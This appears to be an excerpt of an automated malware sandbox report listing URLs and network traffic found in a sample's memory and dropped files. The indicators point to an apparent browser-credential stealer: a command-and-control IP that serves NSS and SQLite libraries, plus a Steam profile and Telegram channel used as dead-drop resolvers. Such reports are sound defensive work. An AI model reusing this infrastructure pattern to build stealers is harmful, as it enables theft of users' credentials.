                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0X
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                    Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: mozglue.dll.1.dr, mozglue[1].dll.1.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                    Source: RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.1.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                    Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.244.9
                    Source: 76561199677575543[1].htm.1.drString found in binary or memory: https://95.217.244.99
                    Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.0000000001530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.244.99/
                    Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.244.99/17.244.99/
                    Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.244.99/B
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.244.99/freebl3.dll
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.244.99/mozglue.dll
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.244.99/msvcp140.dll
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.244.99/nss3.dll
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.244.99/nss3.dlljL
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.244.99/softokn3.dll-H
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.244.99/softokn3.dllcH
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.244.99/sqln.dll
                    Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.244.99/vcruntime140.dll
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.244.99/vcruntime140.dllu
                    Source: RegAsm.exe, 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.244.9910dd9827bbnt-Disposition:
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.244.99AKFC
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.244.99EGHJ
                    Source: BAAFIJKK.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                    Source: 76561199677575543[1].htm.1.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                    Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
                    Source: BAAFIJKK.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: BAAFIJKK.1.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: BAAFIJKK.1.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHly8&a
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=Kg_v7CMM
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=C4Kx
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=-zPAhzrcAAqx&l=e
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                    Source: 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=BMF068jICwP9&
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                    Source: BAAFIJKK.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: BAAFIJKK.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: BAAFIJKK.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://help.steampowered.com/en/
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: https://mozilla.org0/
                    Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                    Source: 76561199677575543[1].htm.1.drString found in binary or memory: https://steamcommunity.com/
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/H
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: 76561199677575543[1].htm.1.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199677575543
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://steamcommunity.com/market/
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: file.exe, file.exe, 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199677575543
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199677575543/badges
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199677575543/inventory/
                    Source: file.exe, 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199677575543Mozilla/5.0
                    Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199677575543w
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://steamcommunity.com/workshop/
                    Source: 76561199677575543[1].htm.1.drString found in binary or memory: https://store.steampowered.com/
                    Source: 76561199677575543[1].htm.1.drString found in binary or memory: https://store.steampowered.com/about/
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://store.steampowered.com/explore/
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://store.steampowered.com/legal/
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://store.steampowered.com/mobile
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://store.steampowered.com/news/
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://store.steampowered.com/points/shop/
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://store.steampowered.com/stats/
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: file.exe, file.exe, 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/snsb82
                    Source: file.exe, 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/snsb82At
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: BAAFIJKK.1.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: BAAFIJKK.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                    Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                    Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                    Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
